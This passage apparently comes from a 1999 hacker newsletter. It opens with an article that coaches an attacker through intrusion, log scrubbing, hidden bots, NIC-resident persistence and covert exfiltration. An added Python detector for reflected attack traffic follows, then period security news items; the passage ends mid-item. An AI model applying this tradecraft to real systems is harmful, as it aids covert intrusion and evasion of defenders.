The basic form of penetration is to use stack smashes, which take advantage of basic low-level coding bugs in a piece of application software or an operating system component. The form of a stack smash exploit is to utilize a data coding that allows variable length data that you send to be erroneously copied into fixed length buffers or variables, writing into data past the end of the buffer. Since this data can overrun the stack, you can overwrite a return address for the currently executing function and make the processor jump to and execute arbitrary code of your choosing. If the bug exists in a privileged piece of software, these instructions that you jump to are virtually unlimited, allowing you to do literally anything with the penetrated computer. The problem with this form of attack is that it often requires detailed knowledge of the operating system and memory map of the target.
Often this form of attack will have to be coded in multiple ways to account for even the version of OS and software package being penetrated. The drawback for the attacker and the advantage for the defender is that usually stack smashes involve "groping" around blindly, sending multiple variants with different offsets and values until the appropriate magic version number that works correctly and responds back is found. In some cases an incorrect variant can crash software and systems, necessitating lots of patience and long time delays between variants tried.

A common target for stack smashes are recent and older variants of the "bind" name daemon that is in almost universal use to translate from symbolic DNS names and URLs into numeric IP addresses. The code and traffic structure of this program is very complicated, difficult to debug and ripe with vulnerabilities and bugs. One 17-year-old hacker managed to take over more than 12,000 systems over two years with an automated "bind" takeover worm before he was caught.

Another common form of attack is to exploit the increasingly complex and powerful native data types of application software (especially Microsoft products, which often contain several complete programming languages in things like word processors and mail readers). Web server script exploits also fall into this category. The basic technique here is to either hijack an existing connection and inject malicious data, or to send unsolicited attack traffic that will take over the application and eventually the system.

D) Control

Once you are into the system and have compromised a piece of software, the next bit of work is to get control of the host. This is usually a bootstrap process, where a small piece of code, "the exploit", is first gotten into the target and the vulnerability is used to execute the code. This code needs to contact one of your attack relay systems and download further code and instructions.
The simplest form of bootstrap is to allow remote access to a command shell that can execute arbitrary operating system commands. There are many forms of bootstraps, as they are often linked to the exploit itself, and some, like BackOrifice, include a whole command interpreter. But the more advanced ones download a minimum of code and use existing portions of the operating system code to build a remote control system attack bot. These advanced exploits can, in object-oriented fashion, build whole parallel network stacks and control systems that run invisibly in the background on the machines using software already installed on the machine.

A portion of the bootstrap process during attack is to restart or patch the application that was crashed so that the intrusion is not noticeable. Other important parts of this process include cleaning up the log files to remove intrusion messages and hiding the attack bot so that it isn't listed in the task viewer or process list. "Scrubbing" the log files can be easily accomplished by recording the file pointers to important log files at exploit time, installing and bootstrapping your attack bot, and then "rewinding" the log files to their pre-attack positions to erase any evidence of the installation by overwriting the operating system file pointers in memory with your pre-attack copies. Subsequent log entries will overwrite the evidence of the attack. Log files to be cleaned up include sniffer capture files, system event logs, DNS and other daemon diagnostic files, IDS system files and file integrity checkers like Tripwire. The good attack bots make log files almost useless for intrusion detection.

Your attack bot can control the machine up to the privilege level of the software that has been penetrated. It can access any resource that the original software could. In many cases, this will not include super-user "root" or "administrator" privileges and you will need to use another local exploit to break in further.
One alternative approach is to download a password cracker and dictionary, to be stored in invisible files or unused portions of the disk, and let this cracker run in the background on the machine (invisible on any task list, of course), using a brute force search for the password on the same machine. This generates little traffic and is very difficult for the target to detect, as the machine will work silently to crack the password for you when idle. One such attack system that was used against us used a remarkably compact word-list and a very patient brute force cracker - with good success.

Super-user privileges are not needed all the time. Even in cases where the cracked software has been limited to accessing only a few resources, it is often enough to use the system as an attack relay base. One of our attackers used a "bind" exploit once on a firewall system where we had purposefully confined the non-privileged version of the "bind" program to a "chroot" jail that limited filesystem access to a very small subset of files. This didn't stop the sophisticated attacker much, as even the ordinary-user-privilege "bind" already had permission to access both internal and external Ethernet interfaces and bridge packets between the two to bypass the firewall software.

With careful design, your attack bot can allow you to encrypt, hide, download, remotely install and run arbitrary software packages, and send traffic so that even sniffers installed on the target do not see the packets. It is relatively straightforward to insert and remove packets from the network card transmit and receive queues, so that normal OS security and logging measures on the penetrated host never even detect the traffic (including bypassing low-level transmit and receive counters). Similarly, it isn't a major technical feat to hide the bot tasks so that they don't show up on system diagnostics.
You can completely remotely control a machine and run programs on it, upload and download data, without any indication to the user other than occasional sporadic slowness - which on Windows is almost indistinguishable from normal performance, and Linux and NT aren't much better.

E) Embedding

After you have gotten in and have control of the target, the next step is ensuring that you can retain control even if your actions are discovered. You need to quickly map the local net and penetrate any other system suspected of being a sniffer or key communications links, such as mail servers, to observe any suspicion of intrusion on the part of the target's IT staff.

The next portion of clean up is to trickle in any additional attack code into the target and whatever is needed to make your controlling attack bot install and hide itself on disk. The point here is to allow your bot to survive a system re-boot and retain control so that you do not have to go through the dangerous - and detectable - attack and clean-up sequence again.

Several techniques have been observed for doing this. One is to overwrite existing and little used OS files that exist in nice, known predictable places/paths, but are seldom used (the more marginal games that come with OS distributions, and terminal definitions for obscure terminals quickly come to mind for this purpose). A sophisticated variation on this is to encrypt and spread your binary over many files (sometimes called steganography). Another alternative that requires more low level programming is to use unused, empty portions of local disks. The system then has to be modified to re-enable your bot after rebooting.

A variation on this hidden attack bot is to install a back-door that will lie dormant on the disk and install a small, difficult to detect bot that waits until receipt of a special traffic trigger which will then set off re-assembly from code pieces spread out on disk files and activation of the more powerful attack relay bot.
This kind of traffic trigger system could also be used to render the traffic invisible. One attack system installed itself across multiple systems and suspended normal OS operations and triggered execution of the loaded command in the attack bot upon receipt of a multicast trigger. The OS remained suspended until a time out or reset trigger was received, allowing the exploit to run without any normal security and logging active. By using a multicast trigger, multiple systems can be triggered and momentarily suspended simultaneously, and if the control bot is installed on any sniffer systems, data recording was suspended while the attack bots execute their commands in this suspended state and send their traffic, again rendering the whole attack invisible. Multicast traffic also has the added advantage of being not reported in the default configuration of most sniffers, so unless the IT staff explicitly enables reporting, they will not usually be aware of it. This kind of attack is very difficult to detect unless an operator is paying very close attention to traffic LEDs.

One condition for the attacker to plan for is what happens to your bot if it is discovered. One attacker once used a system that erased itself if it lost contact with the attack relay base for more than a certain period of time, or if the system was re-booted (as would happen when a system gets off-lined because breaches are suspected). In this way any evidence was erased whenever a penetration was suspected.

The Perl language, if installed on the target, provides a nice compact way to download very powerful programs with a minimum of data transferred, and the standard Perl kit includes routines for embedding (hiding) your Perl script into other binaries. Another clever exploit is to store a piece of your attack bot bootstrap sequence on the network card itself.
Most modern network cards have 64 bytes (or more) of EEPROM that are used to store the 6 byte hardware MAC address, leaving the majority of the space unused. More sophisticated server network cards even have more space for downloadable firmware. The mostly unused network card EEPROM is typically loaded by OS drivers in its entirety - usually to a fixed address static buffer. A small segment of code could be programmed into the card and executed from this buffer by an exploit. The advantages to storing a portion of the attack code in the NIC is that it makes tracing the activity of the exploit difficult for someone trying to reverse engineer the code, and more importantly, a short program installed here will survive a disk formatting and OS re-install. This kind of exploit will lead to a lot of head scratching and questions about "How the hell do they keep getting back in after a disk wipe?" at the target.

F) Data extraction/modification

After you have established control, then you can get on with your nefarious purposes. Typically this will be data extraction and modification on the target system. On Microsoft systems, the registry and Microsoft's own system information utility enable rapid gathering and dense transmission of key system configuration back to your attack relay. Under Linux, the /proc filesystem provides the most rapid clues as to system configuration, allowing your attack bot to build a summary of what it found on the newly penetrated server and transmit it to the relay.

Important attributes of data extraction and control of modifications for attack bots are to hide and encrypt this data stream. It will be beneficial to spread these transmissions out over several relay destinations and have them happen at low rates. One of the safer, stealthier data extraction systems is to embed the data in HTTP web transfers that make up a large percentage of most site traffic these days.
Putting your encrypted data deep into packets and disguising it as JPEG or GIF binary data will help hide it. Most traffic loggers and sniffers usually capture only the beginning of most packets, so embedding your data deep into the packet will make it all that much more difficult to see, depending on what security tools your target is equipped with. As was mentioned above, ARP and DNS also provide methods of hiding your data transmissions.

A key piece of information on the path to hiding your attack bot data traffic amongst the target's traffic is understanding your target's traffic patterns. You need to know when, how (what protocol) and who the target is talking to. Both Linux/Unix and Windows come with some pre-made system tools that you can use to record these traffic patterns, without downloading much additional software. The more sophisticated network cards under Windows come with RMON and other MIBs that can be used to gather traffic pattern information, so that your traffic can be spoofed and modified to look like client traffic requested by users at the target site. RedHat Linux contains many pre-installed mapping tools including arpwatch and SNMP that can be used to monitor local traffic to see what kinds of traffic will likely escape detection. Penetrations of the target's ISP to get traffic stats can be a boon here too.

Another important kind of data hiding is to send your data in little bursts, and follow that data with a burst of legitimate addressing or ARP traffic to scroll your attack data off the display screen of any sniffers in case you encounter a fairly quiet traffic level at the target's system. Doing this kind of data transmission in the wee hours of the morning will also lower the chances that there are any humans looking at status screens at the network control center and noticing anomalies.

G) Attack Relay

The final step in attacking is to successfully use your new system as a relay base for other attacks.
Building up a large "fleet" of attack bases is its own reward - with more systems to attack from, your subsequent conquests will be more stealthy and difficult to track. But now your target relay site will likely notice if you start port-scanning "trantor.army.mil" or other such contentious targets, so be careful (this is another real-life example scenario used on us here). Most sysadmins will not take kindly to the possibility of getting phone calls from the U.S. military asking why their servers are attacking them. But then again, most won't notice.

Attack-Tool: One clever exploit a hacker used on one of the "honey-pot" decoy systems we use as hacker-bait for analysis was an SNMP triggered attack reflector. This system used two SNMP triggers to effectively hide the out-bound attacks. The first trigger put the system into listen mode. After sending the trigger, the attacker quickly sends a spoofed attack packet containing the attack to the relay system. The spoofed attack packet is coded to look like a packet from the attack destination to the relay. Upon receipt of the second SNMP trigger and after a delay, the recorded attack packet is sent back to the actual attack target with the original source and destination reversed. In this way the sequence of the attack is seemingly reversed, with the local relay system responding with a single packet after receipt of the single packet from the target. Unless you look carefully on most sniffers and IDS systems, it looks like the target is attacking the relay system instead of the other way around.

A good ploy to avoid detection is to use many different attack relay or mapping systems and to avoid using the same attack relay system twice in the same day or week with a particular target.
An isolated packet here and there destined for a strange system will not arouse many suspicions, but repeated transmissions to the same target could possibly trigger off alarms at the relay or target - however unlikely that may be with most sysadmins asleep at the security wheel.

Conclusion

I hope the above attack techniques scare any sysadmins reading this. As they should. Too many people these days feel that security is keeping out the script-kiddies or installing a firewall. There are a lot of nastier things out there on the net than the mindless script-hordes, so beware. I hope you can use this article to justify better security measures to your boss. This stuff is out there - it's been used on us. Odds are these kinds of exploits have been used on you and you have no knowledge of it.

There are malicious minds developing new attack bots, and communities of people dedicated to the breaching of security measures. I would even surmise that there are now organized and funded efforts on the part of military and intelligence agencies to further develop such offensive software. One of these days, organized crime may even wake up to this.

As we are discovering, it's the law of the jungle out there on the Net, and there are few places to turn to for assistance in case you get some malicious bozo attacking you. Often you are left to your own devices, and with little support from your own organization, that may be technically illiterate when it comes to network security. The only defense seems to be to stay technologically ahead of the attackers - a constant and resource intensive process. The good news is that it's easier to play defense than offence.

Good luck.

P.S. You do have good backups, don't you?
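The SNMP-triggered attack reflector described in section G above leaves a recognisable trace in a capture: the relay emits a packet that is the mirror image (source and destination swapped, payload identical) of a packet it received shortly before, and the inbound SNMP triggers bracket the pair. The following Python script, an added defensive example that is not part of Ruiu's article, looks for that pattern in a list of packet records; the hosts, ports and payload are constructed, and ICMP is skipped because echo replies legitimately mirror their request.

```python
"""Spot the "reflected attack" pattern in a packet log.

Added defensive example (not code from Ruiu's article).  It looks for the
reflector's signature: the relay emits a packet whose source/destination are
the mirror image of an earlier inbound packet and whose payload is identical,
and reports any inbound SNMP (udp/161) packets seen around the pair, which is
where the two triggers would show up.  All addresses below are constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float        # capture time in seconds
    src: str
    dst: str
    proto: str       # "udp", "tcp" or "icmp"
    dport: int       # 0 for icmp
    payload: bytes


@dataclass(frozen=True)
class Reflection:
    inbound: Pkt         # the spoofed packet that arrived "from" the real target
    outbound: Pkt        # the relay's mirror image of it
    triggers: tuple      # inbound udp/161 packets from third parties around the pair


MIN_PAYLOAD = 16   # skip keepalives, bare ACKs and other tiny payloads


def find_reflections(packets, relay, window=120.0):
    """Return every Reflection in which `relay` sent back, within `window`
    seconds, an exact copy of something it had just received.

    ICMP is skipped on purpose: an echo reply legitimately carries the echo
    request's payload back to the sender and would otherwise match.
    """
    pkts = sorted(packets, key=lambda p: p.ts)
    inbound = [p for p in pkts if p.dst == relay]     # stays sorted by ts
    hits = []
    for out in pkts:
        if out.src != relay or out.proto == "icmp" or len(out.payload) < MIN_PAYLOAD:
            continue
        for inb in inbound:
            if inb.ts > out.ts:
                break                                  # later packets cannot be the source
            if out.ts - inb.ts > window:
                continue                               # too old to be the recorded packet
            if inb.src == out.dst and inb.proto == out.proto and inb.payload == out.payload:
                triggers = tuple(
                    t for t in inbound
                    if t.proto == "udp" and t.dport == 161 and t.src != inb.src
                    and inb.ts - window <= t.ts <= out.ts
                )
                hits.append(Reflection(inb, out, triggers))
    return hits


# Constructed capture (RFC 5737 documentation addresses, not real hosts).
RELAY = "192.0.2.10"        # the penetrated host acting as relay
TARGET = "203.0.113.5"      # the real destination of the relayed packet
ATTACKER = "198.51.100.7"   # sends the SNMP triggers
CLIENT = "10.0.0.5"         # ordinary user of the relay's web server
ATTACK = b"CONSTRUCTED-ATTACK-PAYLOAD-0001"

SAMPLE = [
    Pkt(0.0, ATTACKER, RELAY, "udp", 161, b"trigger-1 (listen mode)"),
    Pkt(1.0, TARGET, RELAY, "udp", 31337, ATTACK),              # spoofed: src is the target
    Pkt(2.0, ATTACKER, RELAY, "udp", 161, b"trigger-2 (fire)"),
    Pkt(5.0, CLIENT, RELAY, "tcp", 80, b"GET / HTTP/1.0\r\n\r\n"),
    Pkt(5.1, RELAY, CLIENT, "tcp", 40112, b"HTTP/1.0 200 OK\r\n"),  # normal reply, different payload
    Pkt(6.0, CLIENT, RELAY, "icmp", 0, b"abcdefghijklmnop"),
    Pkt(6.01, RELAY, CLIENT, "icmp", 0, b"abcdefghijklmnop"),     # echo reply, legitimately mirrored
    Pkt(30.0, RELAY, TARGET, "udp", 31337, ATTACK),             # the reflected attack packet
]

if __name__ == "__main__":
    for r in find_reflections(SAMPLE, RELAY):
        print(f"reflection: {r.inbound.src} -> {RELAY} at t={r.inbound.ts}, "
              f"mirrored back at t={r.outbound.ts}; "
              f"SNMP triggers from {sorted({t.src for t in r.triggers})}")
```

A real deployment would feed this from a capture tool's decoded output and tune `window` to the reflector's delay; the payload-equality test is deliberately strict so that ordinary request/response traffic does not match.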
@HWA

43.0 TAIWAN CIRCLES WAGONS IN CYBER-WARFARE
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 26th August 1999 on 11:40 pm CET

A senior Ministry of National Defense official Wednesday said that Taiwan is capable of defending itself from an information technology attack by China, but will not itself provoke a cyber war. The ministry has also set up a special task force to oversee the island's information warfare strategy, said the director of the ministry's Electronic Communications and Information Bureau. "China has put a lot of effort into building up its information capabilities in the past decade," Lin said. He added that Beijing has conducted a few military exercises to test its information warfare development. "But Taiwan is also working on it. We are not as fragile as many people think," he said. Read more below.

From Infowar.com
http://www.infowar.com/mil_c4i/99/mil_c4i_082599c_j.shtml

China: Taiwan Circles Wagons In Cyber-warfare.

A senior Ministry of National Defense official said yesterday that Taiwan is capable of defending itself from an information technology attack by China, but will not itself provoke a cyber war. The ministry has also set up a special task force to oversee the island's information warfare strategy, said Lin Ching-ching, the director of the ministry's Electronic Communications and Information Bureau.

"China has put a lot of effort into building up its information capabilities in the past decade," Lin said. He added that Beijing has conducted a few military exercises to test its information warfare development. "But Taiwan is also working on it. We are not as fragile as many people think," he said.

A power outage that plunged four-fifths of the island into darkness on July 29 intensified Taiwanese people's fear of a Chinese military attack.
But while those fears have gone unrealized, cross-strait tensions continued to rise in early August as hackers from both sides of the strait broke into each other's government websites to post provocative slogans and national flags. The Internet battle also raised public questions as to whether Taiwan has the capability to handle what will be a future trend - information warfare, which is widely viewed as a major challenge to the island's information technology.

Lin allayed such concerns, saying that Taiwan has the ability to counter China's information attack and has set up a military information warfare strategic policy committee as the highest decision-making body on the issue. Lin said that none of the island's computer systems broke down during the blackout. Generally, man-made mistakes cause 70 percent of computer breakdowns on the island, he said. "We have realized that killing viruses is not our top priority and a crisis-solving center should be established," he said.

But because Taiwan has a limited national defense budget, everything must be cost-effective, said Lin. According to Webster Chiang, the vice chairman of the Cabinet's Research, Development and Evaluation Commission, the maintenance and development of information protection systems accounts for only one percent of the national budget.

Chang Kwang-yuan, director of the information division at the National Security Bureau, said the bureau had tracked down 165 websites as the sources of hacking by mainland Chinese on August 7. He said that some of the websites were found to be government-operated but declined to identify whether the intrusions were orchestrated by the Chinese government or individual hackers.

Tang Yao-chung, an information science professor at National Taiwan University, suggested that the government devote more effort to the development of Taiwan's offensive computer warfare capabilities.
"Developing coding abilities is a profitable business and should be done by private companies," said Tang. "But decoding and building offensive strategies are the government's responsibilities."

Lin said he does not encourage provoking China by Internet hacking, but said Taiwan is capable of standing firmly. "On a legal basis, we don't encourage taking the offensive, although we do have the ability to handle any offensive aggression by China," said Lin.

The cross-strait cyber war is likely to continue as more websites from both sides are hacked. While Taiwan is focusing on more military purchases, the incident provided a chance for Taiwan to re-examine its information security.

ASIA INTELLIGENCE WIRE CHINA NEWS 17/08/1999

@HWA

44.0 UK WEBHOSTING COMPANY HIT BY VIRUS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 26th August 1999 on 11:15 pm CET

UK-based Web hosting and development company Fortune Cookie Digital Media was subject to an attack by the Backdoor-G trojan yesterday, affecting approximately 10 percent of the sites hosted according to the company.

Full story
http://www.idg.net/idgns/1999/08/26/UKWebHostingCompanyHitBy.shtml

U.K. Web hosting company hit by virus
by Douglas F. Gray, IDG News Service\London Bureau
August 26, 1999

U.K.-based Web hosting and development company Fortune Cookie Digital Media was subject to an attack by a "Trojan horse" virus yesterday, affecting a number of Web sites hosted by the company. Approximately 10 percent of the sites hosted by the company were infected with the virus, according to Justin Cooke, founder and managing director of Fortune Cookie. Earlier media reports quoted Cooke as stating the number as 30 percent, a figure which he now states was "probably an overestimation because [the situation] was still going on."
The Trojan horse virus, called BackDoor-G, provided access to passwords that uploaded a second virus to the Web server, which then infected certain default documents, including default.htm and index.html, according to a press release issued by the U.K. company. Cooke admitted that some of the Web sites affected by the virus belonged to "small-to-medium companies," but he refused to name them. The company release claimed that "all affected Web sites were returned to normal operation" within 20 minutes.

Fortune Cookie, in London, can be reached at http://www.fortune-cookie.com/.

@HWA

45.0 NETSCAPE ISSUES WEB-SERVER FIX
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 26th August 1999 on 10:50 pm CET

Netscape and ISS X-Force have issued a patch for the buffer overflow problem in the Netscape Enterprise and FastTrack servers. ".. an attacker can exploit the vulnerability and remotely upload and execute arbitrary assembly language. An attacker can write an exploit to get the computer to do what ever they want.." according to X-Force director Chris Rouland. Infoworld has a story, Iplanet has a patch.

http://www.iplanet.com/downloads/patches/detail_12_86.html

@HWA

46.0 CWI CRACKS 512 BIT KEY
     ~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 26th August 1999 on 10:20 pm CET

Researchers of the CWI in Amsterdam, Holland, today announced that they have been able to crack a 512 bit code. This once more proves that this standard, which is still used on the Internet for e-commerce transactions a lot, just doesn't cut it. The technology they used (besides 300 workstations and Pentium II's :) will enable them to crack any 512 bit code in the future according to CWI.
@HWA

47.0 MOUNTING AN ANTI-VIRUS DEFENSE
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 26th August 1999 on 10:00 pm CET

With computer viruses on the rise, and in the wake of the 'Melissa' incident, anti-virus software becomes a part of the security arsenal. What's needed to keep the viruses out? Some firms present their ideas and solutions in this article.

Mounting an anti-virus defense
With computer viruses on the rise, and in the wake of the 'Melissa' incident, anti-virus software becomes a part of the security arsenal
By Heather Harreld

Anti-virus software, which often was viewed as the security stepchild to sibling powerhouse technologies such as intrusion detection and firewalls, has been elevated to a new market status following the "Melissa" virus, which in March infected machines worldwide via e-mail. Once sold mainly as a single desktop solution - which users often labored to disable or bypass - anti-virus software is being bundled with other security solutions designed to secure entire enterprises from security threats.

Anti-virus software has emerged as an integral component of agency security efforts because viruses are more easily transmitted in today's networked world, and the viral breeding ground of the Internet has spurred phenomenal virus growth. Although the majority of viruses in 1997 were transmitted by floppy disks, the major source of virus infections today are from e-mail attachments, which can be used to spread a virus at alarming speed. The Melissa virus affected more than 100,000 machines worldwide in just days by seizing users' computers and e-mailing copies of itself to the first 50 names in the e-mail address book.

In 1986, there was one known computer virus; in 1990 that number had jumped to 80. From December 1998 to January 1999, the total virus count jumped from 20,500 to 36,500. Today, there are about 45,000 computer viruses in existence, with new ones appearing every day.
"A lot of the virus attacks...are starting to blur the lines between [a virus or a vulnerability?]" said Sal Viveros, group product manager for Network Associates Inc.'s Total Virus Defense Division. "It is much easier for a hacker to send an e-mail attachment than it is to penetrate a firewall. We're seeing more destructive viruses that are hitting more people."

Network Associates offers an anti-virus package that provides virus protection spanning the desktop, groupware and gateways, and it also has a security suite offering anti-virus software coupled with firewalls, intrusion detection and encryption. Viveros said the common alerting and reporting mechanisms from the security suite enable a network administrator to react more quickly to problems. For example, if a hacker finds an open port and uses it to insert a virus, intrusion-detection and anti-virus software can work in tandem to provide an accurate picture of what is happening on a network.

"You're starting to have rules-based reactions," Viveros said. "You're taking away the need for the network administrator to be sitting there monitoring those different things when they happen. By setting rules, the different components are talking to each other."

Symantec Corp. in May announced its Digital Immune System, a strategy to capitalize on its anti-virus technology, while coupling it with intelligent tools designed to keep systems running at peak performance. With its anti-virus software, the company will offer tools for server management, desktop configuration, remote system operation and disaster recovery - all from a single console.

Chris Mills, Symantec's product manager for Digital Immune System, noted that the strategy will include advanced anti-virus management tools that enable a network administrator to lock down policy requirements on the desktop and configure virus responses that automatically go into effect upon detection.
In addition, the company plans to add security mechanisms such as e-mail scanning, Uniform Resource Locator filtering and protection from malicious Java applets, he added. "What [customers are] worried about are threats to their enterprise," Mills said. "It's not strictly an anti-virus concept. We're talking about protecting your enterprise from unknown threats that will negatively affect your credibility, your cost and your uptime."

Worldtalk Corp. has bundled multiple security mechanisms into its secure server product, which is being used by the Energy Department and the Food and Drug Administration. In addition to a server-based virus detection solution, the company also offers access control, which regulates who a user can send e-mail to and receive e-mail from, and encryption controls.

DOE's headquarters used Worldtalk's secure server to begin containing the potentially devastating Melissa virus before a fix was even discovered for it, said Charlie Smith, information management consultant at DOE. Smith said that although many other anti-virus products provide the ability to disinfect incoming viruses before they are passed on to users, Worldtalk's server enabled him to program a policy that would target and quarantine any incoming e-mail with a specific message in its header. "The quarantine allowed us to really track Melissa," Smith said. "It gave us a history to trace back to the originator."

Bill Mann, director of product management at Worldtalk, noted that the ability to program policies into the server also could be used to fend off potentially damaging mobile code, such as hostile Java applets, that users unknowingly can download from World Wide Web sites. "Literally anything that can be done by a program can be done by mobile code," Mann said. "It can open database connections. It can install viruses on your PC. Mobile code gives the hackers so much more flexibility than virus writing."
It is not only traditional anti-virus and computer security companies that are homing in on technology to combat viruses. Companies targeting the electronic-commerce market are bundling anti-virus software with other computer security solutions. In July, Computer Associates International Inc. introduced its eTrust security solution, which bundles anti-virus technology with public-key infrastructure technology, encryption controls, intrusion-detection scanners, firewall components, network surveillance and authentication tools.

Kurt Ziegler, senior vice president for CA's security business, said the eTrust network surveillance component is crucial to containing viruses because users have not always updated their software to detect the latest viruses. Because these identification delays can be devastating, a containment strategy is crucial, he said. "We include some technology that lets you identify movement, to get a pattern," Ziegler said. "It scans the network on the inside...so you can see a neighbor sending it to a neighbor inadvertently. Should you get an identification...you can quickly go back over that traffic and say who's carrying what where."

Judith Spencer, director of the Center for Governmentwide Security at the General Services Administration, said the Melissa virus - combined with other incidents, such as a hacker group threat to target the federal government - has helped increase government security awareness. She noted that though anti-virus software is "indispensable" on systems today, it should be viewed as only part of an agency's security arsenal. "Integrated security solutions are a good idea," Spencer said. "[But] the way that you implement security solutions as opposed to whether or not the product comes bundled is more important."
Bundling anti-virus software with security mechanisms located at the perimeter of a network is advantageous because everything coming in to the environment is checked, and network administrators do not have to worry if end users have updated their software, said Lance Travis, service director at Boston-based AMR Research Inc. However, that method also has its drawbacks, he noted. "You're now scanning every e-mail message [and] every Web page that comes through your firewall," Travis said. "There's a huge performance penalty you could potentially pay."

Trend Micro Inc. is an anti-virus firm that has chosen not to bundle its anti-virus software with other security products. Instead, the company is designing its products so that they will interoperate with other key products needed for security, said Dan Schrader, Trend Micro's vice president of new technology. Trend Micro offers an integrated border security approach, scanning for viruses at perimeter points such as e-mail servers and Internet gateways. That approach was designed to stop viruses and malicious code before they enter the network.

Trend Micro's anti-virus software is being used by the Department of Housing and Urban Development on 75 servers to support about 11,000 users. The product was designed to eliminate the expensive and disruptive "pre-emptive e-mail shutdown" strategy that many government agencies are forced to deploy when threatened with viral infection, Schrader said. "You want to identify where key Internet traffic enters your organization and have the code scanner at those entry points," Schrader said. "Anything that relies on the end users for best practices is doomed to fail."

Many anti-virus vendors are moving to take control of the software away from end users, who notoriously try to bypass the software safeguard or forget to update it to protect from new viruses.
But Roger Thompson, technical director of malicious code research at the International Computer Security Association, noted that anti-virus software still must be multilayered. "If an infected document is attached to an e-mail, then something at the mail server or firewall wouldn't pick it up if the document was encrypted," Thompson said. "You still have to have detection on the desktops."

Anti-virus software vendors may see the demand for their products increase even more in the future as virus-like threats to networks continue to grow. William Orvis, security specialist at the Computer Incident Advisory Capability at Lawrence Livermore National Laboratory, noted that he is seeing an increasing incidence of worms - programs that crawl through networks, automatically making and distributing copies of themselves while installing dangerous back doors in systems as they move. As a result, unauthorized users can remotely control a system with a back door installed.

Anti-virus software can be designed to watch networks for worms. However, Orvis said products of the future will have to "intelligently" detect viruses that have never been seen before, instead of relying on tracking viruses by their "signatures," which is the most common viral-detection method today. "We need a way that we can have smart computer code...and say, 'That is probably a virus,' " Orvis said. "We need to learn to teach a machine to recognize a virus."

Harreld is a free-lance writer based in Cary, N.C.

@HWA

48.0 RETROSPECTIVE ON CRACKING CONTESTS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Thursday 26th August 1999 on 3:25 am CET

We covered both the Windows2000 and LinuxPPC cracking contests on HNS. The Linux machine got one-tenth the number of attacks that the Microsoft server has endured. Neither of the servers was compromised, and the companies said data stored within those servers has remained secure. ABC has an article on it. Read it here.
Microsoft and Linux PPC Engage in Testing One-Upsmanship

Microsoft put a bullseye on its Windows 2000 operating system by inviting hackers to have a go at it. So far the system has crashed, but hackers haven't gained access. (A.Shepherd/ABCNEWS.com)

By Michael J. Martinez
ABCNEWS.com

Aug. 24 — Three weeks ago, Microsoft engineers loaded up a server with Windows 2000 beta, connected it to the Internet and invited anyone who wanted to test its security by trying to break into it. The next day two things happened: the Windows 2000 operating system crashed because of a bug, and Linux PPC, a small company in Hales Corners, Wis., put up a server running a Linux-based operating system and issued the same invitation.

Since then, both servers have gone down due to various technical problems, though neither has been “cracked;” no one has been able to access the information stored on those servers. Both Microsoft and Linux PPC have claimed the tests demonstrate the security of their respective operating systems, though the frequency of problems on the Microsoft server has been a source of jokes among Linux enthusiasts.

Microsoft Puts On a Bullseye

The new Windows 2000 operating system, due to be released in October, will replace Windows NT as Microsoft’s workstation and server operating systems for businesses. Despite a release schedule marred by numerous delays and in spite of the growth of popularity of competing systems — particularly those of Linux — Microsoft hopes the new operating system will be as broadly accepted as its predecessors.

So, on Aug. 2, Microsoft loaded a 500 MHz Pentium III server with Windows 2000 and the IIS Web server program, and linked it to the Internet. The system lacked a firewall — impermeable software designed to protect a system’s entry points — and was protected only by the security inherent to the Windows 2000 operating system. The next day, router failures (not hackers) caused intermittent downtimes. The problems continued until Aug. 14, the first day without downtime on the server. Since then, there have been three other disruptions.

On the test Web site, Microsoft managers note that no data has been taken from the machine — it still remains secure. In addition, a number of software bugs in the Windows 2000 software have been discovered and fixed.

Linux Chimes In

The day Microsoft announced its tests, the engineers at Linux PPC began receiving user e-mails wondering if the company would respond in kind. Linux PPC is different from other Linux distributors; its OS is made for Macintoshes instead of the usual IBM clones. “The response from our users was enormous,” says Marcia Knapp, business manager for the company. “They were confident that our software could withstand much more than Microsoft’s, so we decided to put a box up.”

The Linux PPC machine is a far cry from the high-end server Microsoft is using. The company is using a 132 MHz Power Macintosh with just 160 MB of RAM, and the machine is running an open-source Apache Web server. Yet the Linux machine has only gone down twice — and one of those times was because someone tripped on a cord. The other time was because of a successful denial of service attack — the server was crashed not because of a security breach, but because someone attempted to overload it with meaningless data.

Under Attack

It should be noted that the Linux machine is getting one-tenth the number of attacks that the Microsoft server has endured — and that the Windows 2000 operating system is still in beta, and is due for more debugging once it has been released. Still, both sides claim the data stored within those servers has remained secure. It may have been just another PR stunt. But once again Microsoft comes out looking like a giant with egg on his face — egg tossed by a tiny rival in Wisconsin.
@HWA

49.0 SHOUTCAST COMPROMISED
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by BHZ, Wednesday 25th August 1999 on 10:39 pm CET

ShoutCAST (yp.shoutcast.com), an online directory of sites that offer MP3 music for listening on-line, was compromised earlier today. The attacker just changed the info for the best ranked sites to:

" [skillz] MadCamel 0wns Nullsoft Now Playing: Greetz arr0w listeners -31337/31337 Bitrate - 666

and added an additional link to www.rootshell.com.

@HWA

50.0 AUDIT OFFICE BLASTS AGENCIES' SERIOUS SECURITY FLAWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Wednesday 25th August 1999 on 11:05 am CET

A damning report from the Australian National Audit Office (ANAO), entitled "Operation of the Classification System for Protecting Sensitive Information", has revealed serious flaws in the IT security arrangements of six unnamed Australian commonwealth government agencies. The audited agencies all had sensitive information to protect, with three of the six responsible for protecting national security information. Read more.

http://www2.idg.com.au/CWT1997.nsf/Home+page/4C49A498F5EBCD6F4A2567D70021F2FE?OpenDocument

Audit Office blasts agencies' serious IT security flaws

By Laura Mason
25 August, 1999

